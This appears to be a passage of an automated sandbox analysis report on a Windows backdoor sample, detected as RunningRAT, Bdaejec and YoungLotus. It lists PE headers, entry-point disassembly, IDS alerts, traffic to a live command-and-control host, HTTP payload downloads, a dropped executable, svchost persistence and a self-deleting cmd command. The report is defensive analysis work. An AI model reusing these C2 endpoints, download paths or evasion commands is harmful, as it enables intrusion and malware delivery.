                                                                                                              Entrypoint:0x40c000
                                                                                                              Entrypoint Section:/|wu>
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x54FD77CC [Mon Mar 9 10:37:00 2015 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:24ffff844f7eed74e1f1064cc9840ba9

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              sub esp, 0000016Ch
                                                                                                              xor eax, eax
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [ebp-24h], eax
                                                                                                              mov dword ptr [ebp-10h], eax
                                                                                                              mov dword ptr [ebp-14h], eax
                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                              mov dword ptr [ebp-0Ch], eax
                                                                                                              mov dword ptr [ebp-20h], eax
                                                                                                              mov dword ptr [ebp-18h], eax
                                                                                                              mov dword ptr [ebp-48h], 536B6558h
                                                                                                              mov dword ptr [ebp-44h], 652E5475h
                                                                                                              mov dword ptr [ebp-40h], 00006578h
                                                                                                              mov dword ptr [ebp-3Ch], 00000000h
                                                                                                              call 00007F5170BD3AB5h
                                                                                                              pop eax
                                                                                                              add eax, 00000225h
                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                              mov eax, dword ptr fs:[00000030h]
                                                                                                              mov dword ptr [ebp-28h], eax
                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                              mov dword ptr [eax], E904C483h
                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                              mov dword ptr [eax+04h], FFFF6661h
                                                                                                              mov eax, dword ptr [ebp-28h]
                                                                                                              mov eax, dword ptr [eax+0Ch]
                                                                                                              mov eax, dword ptr [eax+1Ch]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov eax, dword ptr [eax+08h]
                                                                                                              mov ecx, dword ptr [eax+3Ch]
                                                                                                              mov ecx, dword ptr [ecx+eax+78h]
                                                                                                              add ecx, eax
                                                                                                              mov edi, dword ptr [ecx+1Ch]
                                                                                                              mov ebx, dword ptr [ecx+20h]
                                                                                                              mov esi, dword ptr [ecx+24h]
                                                                                                              mov ecx, dword ptr [ecx+18h]
                                                                                                              add esi, eax
                                                                                                              add edi, eax
                                                                                                              add ebx, eax
                                                                                                              xor edx, edx
                                                                                                              mov dword ptr [ebp-30h], esi
                                                                                                              mov dword ptr [ebp-1Ch], edx
                                                                                                              mov dword ptr [ebp-34h], ecx
                                                                                                              cmp edx, dword ptr [ebp-34h]
                                                                                                              jnc 00007F5170BD3BFEh
                                                                                                              movzx ecx, word ptr [esi+edx*2]
                                                                                                              mov edx, dword ptr [ebx+edx*4]
                                                                                                              mov esi, dword ptr [edi+ecx*4]
                                                                                                              add edx, eax
                                                                                                              mov ecx, dword ptr [edx]
                                                                                                              add esi, eax
                                                                                                              cmp ecx, 4D746547h
                                                                                                              jne 00007F5170BD3B04h
                                                                                                              cmp dword ptr [edx+04h], 6C75646Fh
                                                                                                              jne 00007F5170BD3AFBh

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [C++] VS98 (6.0) SP6 build 8804
                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa2a00x64.data
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb0000xa98.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x30000x280.data
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x1b830x2000af004437d972dc872368f31fffd6aaa6False0.4327392578125data5.330045711780258IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .data0x30000x78b60x80007670af3ae88481f9995ead7463909f4fFalse0.496185302734375data5.753859530710346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0xb0000xa980x1000c41cc8dcf2debdfbcfbd52158b76ca73False0.26123046875data2.5169812284194717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              /|wu>0xc0000x50000x5000b1b31fef029b3b66b3d59ff5e8ac89afFalse0.642529296875data6.037548684936156IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xb1600x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.33064516129032256
                                                                                                              RT_ICON0xb4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128ChineseChina0.4391891891891892
                                                                                                              RT_DIALOG0xb5980x1c6dataChineseChina0.5682819383259912
                                                                                                              RT_GROUP_ICON0xb5700x22dataChineseChina1.0
                                                                                                              RT_VERSION0xb7600x338dataFrenchFrance0.45024271844660196

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              MFC42.DLL
                                                                                                              MSVCRT.dll_controlfp, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, _onexit, __dllonexit, _except_handler3, memset, __p__pgmptr, sprintf, memcpy, _access, __CxxFrameHandler, strstr, _setmbcp, _mkdir
                                                                                                              KERNEL32.dllCloseHandle, CreateFileA, FreeLibrary, GetTickCount, GetFileAttributesA, ExpandEnvironmentStringsA, GetLastError, GetProcAddress, LoadLibraryA, lstrcpyA, GetCommandLineA, Sleep, lstrcmpiA, SetThreadPriority, GetCurrentThread, SetPriorityClass, GetCurrentProcess, GetModuleHandleA, GetStartupInfoA, WriteFile
                                                                                                              USER32.dllSendMessageA, IsIconic, GetClientRect, EnableWindow, LoadIconA, GetSystemMetrics, wsprintfA, DrawIcon

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              ChineseChina
                                                                                                              FrenchFrance

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-10-29T10:58:58.815691+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.4557161.1.1.153UDP
                                                                                                              2024-10-29T10:58:58.815691+01002814897ETPRO MALWARE W32.YoungLotus Checkin1192.168.2.449743119.91.152.1518321TCP
                                                                                                              2024-10-29T10:58:59.583625+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.44973044.221.84.105799TCP
                                                                                                              2024-10-29T10:59:00.276781+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.44973144.221.84.105799TCP
                                                                                                              2024-10-29T10:59:00.976850+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.44973244.221.84.105799TCP
                                                                                                              2024-10-29T10:59:01.671009+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.44973344.221.84.105799TCP
                                                                                                              2024-10-29T10:59:02.288886+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.44973444.221.84.105799TCP
                                                                                                              2024-10-29T10:59:11.785152+01002814897ETPRO MALWARE W32.YoungLotus Checkin1192.168.2.449735119.91.152.1518321TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 29, 2024 10:58:59.031331062 CET49730799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.037146091 CET7994973044.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:58:59.037249088 CET49730799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.052006006 CET49730799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.057435989 CET7994973044.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:58:59.583529949 CET7994973044.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:58:59.583625078 CET49730799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.619582891 CET7994973044.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:58:59.619726896 CET49730799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.622030020 CET49730799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.627479076 CET7994973044.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:58:59.725558043 CET49731799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.731234074 CET7994973144.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:58:59.731331110 CET49731799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.731482029 CET49731799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:58:59.737152100 CET7994973144.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:00.276698112 CET7994973144.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:00.276781082 CET49731799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:00.311826944 CET7994973144.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:00.311897039 CET49731799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:00.323430061 CET49731799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:00.328959942 CET7994973144.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:00.416440964 CET49732799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:00.422079086 CET7994973244.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:00.422405005 CET49732799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:00.426211119 CET49732799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:00.431684017 CET7994973244.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:00.973638058 CET7994973244.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:00.976850033 CET49732799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.008347988 CET7994973244.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.008857965 CET49732799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.085131884 CET49732799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.090738058 CET7994973244.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.112142086 CET49733799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.119769096 CET7994973344.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.124877930 CET49733799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.125066042 CET49733799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.131089926 CET7994973344.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.670881033 CET7994973344.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.671009064 CET49733799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.705343962 CET7994973344.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.705403090 CET49733799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.710223913 CET49733799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.715553045 CET7994973344.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.736068964 CET49734799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.741574049 CET7994973444.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:01.741746902 CET49734799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.741947889 CET49734799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:01.747263908 CET7994973444.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:02.286957026 CET7994973444.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:02.288886070 CET49734799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:02.321790934 CET7994973444.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:02.324898958 CET49734799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:02.350955009 CET49734799192.168.2.444.221.84.105
                                                                                                              Oct 29, 2024 10:59:02.356461048 CET7994973444.221.84.105192.168.2.4
                                                                                                              Oct 29, 2024 10:59:03.286133051 CET497358321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:03.291642904 CET832149735119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 10:59:03.291765928 CET497358321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:03.482254982 CET497358321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:03.487755060 CET832149735119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 10:59:11.784923077 CET832149735119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 10:59:11.784993887 CET497358321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:11.785151958 CET497358321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:12.287389040 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:12.292937994 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 10:59:12.293096066 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:12.339306116 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 10:59:12.344947100 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:00:02.813931942 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:00:02.865097046 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 11:01:02.907212973 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:01:02.959022999 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 11:02:02.998500109 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:02:03.052860975 CET497438321192.168.2.4119.91.152.151
                                                                                                              Oct 29, 2024 11:03:03.093449116 CET832149743119.91.152.151192.168.2.4
                                                                                                              Oct 29, 2024 11:03:03.146815062 CET497438321192.168.2.4119.91.152.151

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 29, 2024 10:58:58.815690994 CET5571653192.168.2.41.1.1.1
                                                                                                              Oct 29, 2024 10:58:59.005286932 CET53557161.1.1.1192.168.2.4

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Oct 29, 2024 10:58:58.815690994 CET192.168.2.41.1.1.10x227dStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Oct 29, 2024 10:58:59.005286932 CET1.1.1.1192.168.2.40x227dNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • ddos.dnsnb8.net:799

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.44973044.221.84.1057996180C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Oct 29, 2024 10:58:59.052006006 CET288OUTGET /cj//k1.rar HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                              Host: ddos.dnsnb8.net:799
                                                                                                              Connection: Keep-Alive


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.44973144.221.84.1057996180C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Oct 29, 2024 10:58:59.731482029 CET288OUTGET /cj//k2.rar HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                              Host: ddos.dnsnb8.net:799
                                                                                                              Connection: Keep-Alive


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.44973244.221.84.1057996180C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Oct 29, 2024 10:59:00.426211119 CET288OUTGET /cj//k3.rar HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                              Host: ddos.dnsnb8.net:799
                                                                                                              Connection: Keep-Alive


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.44973344.221.84.1057996180C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Oct 29, 2024 10:59:01.125066042 CET288OUTGET /cj//k4.rar HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                              Host: ddos.dnsnb8.net:799
                                                                                                              Connection: Keep-Alive


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.44973444.221.84.1057996180C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Oct 29, 2024 10:59:01.741947889 CET288OUTGET /cj//k5.rar HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                              Host: ddos.dnsnb8.net:799
                                                                                                              Connection: Keep-Alive


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:05:58:57
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Users\user\Desktop\gE4NVCZDRk.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\gE4NVCZDRk.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:69'632 bytes
                                                                                                              MD5 hash:02B3757B29002A8FCABD9AFAEBF1F7D3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: 00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:05:58:57
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              Imagebase:0x3c0000
                                                                                                              File size:15'872 bytes
                                                                                                              MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 97%, ReversingLabs
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:05:58:57
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
                                                                                                              Imagebase:0xac0000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:05:58:57
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\svchost.exe -k "SySyeu"
                                                                                                              Imagebase:0xac0000
                                                                                                              File size:46'504 bytes
                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:05:58:59
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
                                                                                                              Imagebase:0x240000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:05:58:59
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:05:58:59
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:ping 127.0.0.1 -n 1
                                                                                                              Imagebase:0xcf0000
                                                                                                              File size:18'944 bytes
                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:05:59:01
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\SySyeu.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThread
                                                                                                              Imagebase:0xe10000
                                                                                                              File size:61'440 bytes
                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:05:59:03
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:05:59:03
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
                                                                                                              Imagebase:0x3f0000
                                                                                                              File size:483'680 bytes
                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:05:59:03
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456
                                                                                                              Imagebase:0x3f0000
                                                                                                              File size:483'680 bytes
                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:14
                                                                                                              Start time:06:00:18
                                                                                                              Start date:29/10/2024
                                                                                                              Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:wmiadap.exe /F /T /R
                                                                                                              Imagebase:0x7ff70f2a0000
                                                                                                              File size:182'272 bytes
                                                                                                              MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:30.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:10.7%
                                                                                                                Total number of Nodes:187
                                                                                                                Total number of Limit Nodes:5
